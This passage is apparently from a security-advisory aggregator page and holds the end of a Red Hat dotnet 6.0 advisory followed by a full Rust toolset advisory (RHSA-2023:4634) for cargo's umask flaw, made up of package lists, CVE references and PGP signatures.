2228621 - CVE-2023-38180 dotnet: Kestrel vulnerability to slow read attacks leading to Denial of Service attack  
2228622 - CVE-2023-35390 dotnet: RCE under dotnet commands

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
dotnet6.0-6.0.121-1.el9_0.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.21-1.el9_0.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-host-6.0.21-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-6.0.121-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-templates-6.0-6.0.121-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.121-1.el9_0.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.21-1.el9_0.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-host-6.0.21-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-6.0.121-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-templates-6.0-6.0.121-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.121-1.el9_0.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.21-1.el9_0.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-host-6.0.21-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-6.0.121-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-templates-6.0-6.0.121-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.121-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35390  
https://access.redhat.com/security/cve/CVE-2023-38180  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2oyFAAoJENzjgjWX9erEj2oP/RqK1aqGXClVXAeBRTHaLI3B  
fg+/K4jJhw4Mgahi0xQBTYwNT1i0z1W7pCWtbqmj/o1dXCUBkKJratvown4xJeiP  
Yq24yzQdMwsY60p1UDKlRoFJ6zJqTqSO75xPTRInnUIzS3s4WjGl1d0iO3q4En+z  
Cr2s7q3MnBhJvGprwx4WdyZMoQ/8k/4wnubkUT+5TPw400xsJAs57vJGdkSDLQ6o  
3AQf4WXJjv/qJMo2gdIVWUt5KFe6J4Jjf7Y+lgS5cyXpdU+4galf5Vg3SCVJxEl8  
ejZ/tsPmsdgFQFoBtBj7QlOuOGVEpkStD4jiUmjLO2btJq9ajVgT1x8e41gW3XQV  
afQYaJouneYJZq5i6ukIXisu3pPjjlt9BB7pUyCFhmbFTp8s40BfskyW/wCbut8F  
vac+zhLdSl/9yGoWhZZ6xugrBKbSdEmmqgWsZi7u0Yjt7iFaU7LuTHIutEisckEj  
sUpnVif+eO4vp2NON5xCrLSE4Cnl7Ox3yHY8SivcdKE+2QFWHzVyt4QzXaG6YsmA  
SVR/zigWF3V9iUZyYZgc4z2nPbzkQVTOdyWL825ETFNrzoSVXKgmnuCpEi8fvNAd  
EQn8dzlslRcZRfJm1Abk9NpmxpGWZKhvfH2nSci183/i8+wT3F2X4Ie38cg1hmdM  
XY9iRvmyIBdY4OP61UKL  
=F+Qn  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4639-01

Red Hat Security Advisory 2023-4634-01 - Rust Toolset provides the Rust programming language compiler rustc, the cargo build tool and dependency manager, and required libraries.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: rust security update  
Advisory ID:       RHSA-2023:4634-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4634  
Issue date:        2023-08-14  
CVE Names:         CVE-2023-38497   
=====================================================================

1. Summary:

An update for rust is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Rust Toolset provides the Rust programming language compiler rustc, the  
cargo build tool and dependency manager, and required libraries.

Security Fix(es):

* rust-cargo: cargo does not respect the umask when extracting dependencies  
(CVE-2023-38497)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228038 - CVE-2023-38497 rust-cargo: cargo does not respect the umask when extracting dependencies

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
rust-1.66.1-2.el9_2.src.rpm

aarch64:  
cargo-1.66.1-2.el9_2.aarch64.rpm  
cargo-debuginfo-1.66.1-2.el9_2.aarch64.rpm  
clippy-1.66.1-2.el9_2.aarch64.rpm  
clippy-debuginfo-1.66.1-2.el9_2.aarch64.rpm  
rust-1.66.1-2.el9_2.aarch64.rpm  
rust-analysis-1.66.1-2.el9_2.aarch64.rpm  
rust-analyzer-1.66.1-2.el9_2.aarch64.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.aarch64.rpm  
rust-debuginfo-1.66.1-2.el9_2.aarch64.rpm  
rust-debugsource-1.66.1-2.el9_2.aarch64.rpm  
rust-doc-1.66.1-2.el9_2.aarch64.rpm  
rust-std-static-1.66.1-2.el9_2.aarch64.rpm  
rust-toolset-1.66.1-2.el9_2.aarch64.rpm  
rustfmt-1.66.1-2.el9_2.aarch64.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.aarch64.rpm

noarch:  
rust-debugger-common-1.66.1-2.el9_2.noarch.rpm  
rust-gdb-1.66.1-2.el9_2.noarch.rpm  
rust-lldb-1.66.1-2.el9_2.noarch.rpm  
rust-src-1.66.1-2.el9_2.noarch.rpm  
rust-std-static-wasm32-unknown-unknown-1.66.1-2.el9_2.noarch.rpm  
rust-std-static-wasm32-wasi-1.66.1-2.el9_2.noarch.rpm

ppc64le:  
cargo-1.66.1-2.el9_2.ppc64le.rpm  
cargo-debuginfo-1.66.1-2.el9_2.ppc64le.rpm  
clippy-1.66.1-2.el9_2.ppc64le.rpm  
clippy-debuginfo-1.66.1-2.el9_2.ppc64le.rpm  
rust-1.66.1-2.el9_2.ppc64le.rpm  
rust-analysis-1.66.1-2.el9_2.ppc64le.rpm  
rust-analyzer-1.66.1-2.el9_2.ppc64le.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.ppc64le.rpm  
rust-debuginfo-1.66.1-2.el9_2.ppc64le.rpm  
rust-debugsource-1.66.1-2.el9_2.ppc64le.rpm  
rust-doc-1.66.1-2.el9_2.ppc64le.rpm  
rust-std-static-1.66.1-2.el9_2.ppc64le.rpm  
rust-toolset-1.66.1-2.el9_2.ppc64le.rpm  
rustfmt-1.66.1-2.el9_2.ppc64le.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.ppc64le.rpm

s390x:  
cargo-1.66.1-2.el9_2.s390x.rpm  
cargo-debuginfo-1.66.1-2.el9_2.s390x.rpm  
clippy-1.66.1-2.el9_2.s390x.rpm  
clippy-debuginfo-1.66.1-2.el9_2.s390x.rpm  
rust-1.66.1-2.el9_2.s390x.rpm  
rust-analysis-1.66.1-2.el9_2.s390x.rpm  
rust-analyzer-1.66.1-2.el9_2.s390x.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.s390x.rpm  
rust-debuginfo-1.66.1-2.el9_2.s390x.rpm  
rust-debugsource-1.66.1-2.el9_2.s390x.rpm  
rust-doc-1.66.1-2.el9_2.s390x.rpm  
rust-std-static-1.66.1-2.el9_2.s390x.rpm  
rust-toolset-1.66.1-2.el9_2.s390x.rpm  
rustfmt-1.66.1-2.el9_2.s390x.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.s390x.rpm

x86_64:  
cargo-1.66.1-2.el9_2.x86_64.rpm  
cargo-debuginfo-1.66.1-2.el9_2.i686.rpm  
cargo-debuginfo-1.66.1-2.el9_2.x86_64.rpm  
clippy-1.66.1-2.el9_2.x86_64.rpm  
clippy-debuginfo-1.66.1-2.el9_2.i686.rpm  
clippy-debuginfo-1.66.1-2.el9_2.x86_64.rpm  
rust-1.66.1-2.el9_2.x86_64.rpm  
rust-analysis-1.66.1-2.el9_2.x86_64.rpm  
rust-analyzer-1.66.1-2.el9_2.x86_64.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.i686.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.x86_64.rpm  
rust-debuginfo-1.66.1-2.el9_2.i686.rpm  
rust-debuginfo-1.66.1-2.el9_2.x86_64.rpm  
rust-debugsource-1.66.1-2.el9_2.i686.rpm  
rust-debugsource-1.66.1-2.el9_2.x86_64.rpm  
rust-doc-1.66.1-2.el9_2.x86_64.rpm  
rust-std-static-1.66.1-2.el9_2.i686.rpm  
rust-std-static-1.66.1-2.el9_2.x86_64.rpm  
rust-toolset-1.66.1-2.el9_2.x86_64.rpm  
rustfmt-1.66.1-2.el9_2.x86_64.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.i686.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38497  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2oyDAAoJENzjgjWX9erENoQP/jTfkxW4QnmAoKoj/RfesY37  
Z17/QgOELXVroRlDG0QEPxLccxa1M8FOH+uoJtCOypm65WT3BM/+6oCfMJnycee8  
aGWuo3KN8aY0P8KO83zFWzjgrJznzqa96JRclSVnSlugZ+SUvCSS/1+J/XLMDUIN  
TGhVVwbweep8w1+u05d8OWRlbZcMVkHVJf0WQksVKECxgCuYddDYAGTYRlMohxVm  
IPE84HHBFD/iA4Hg89b9c5u6SCLrNj16p/pvn5vldWDEU6Vf31BAH2uAt2d1lGWk  
LFWNfbg7tC0/8RGq+xnmtdnpHFaSY1dpHqZiIRgvjKReq35h47esptuIWs1dwaZ6  
x9SWXqVHjVz87R1mcFsKhlY7I4l5vEC5lAfjX5fNOnhVbjou9gmmsMsUFpYU+1XV  
uJGAGZ/rMbqz/G0FyeCd14qTqZATf86BgKmqcSuHu3zMx2y8+59PqgBhYBGzN3Tu  
F2TkuUDD8pNQMsmE7qIzZK3/SGb0DgpMQOScs9fmEubsyeODKDG/2EV8zrF7d2nO  
Sr+hQntTAhzB4L+CaFNRNo+rbcbOOidgPK60MOaXux7vwf5Wyahbx9qzghfUBLVc  
QnTCU+bhq/u0GIo/SFh6zRoyhfGqdeIv1Ychlkc9CvsKLM9GUhiuFhoHKewqXQL5  
L1GELcNRzWCW0SpJXtOn  
=RO5t  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux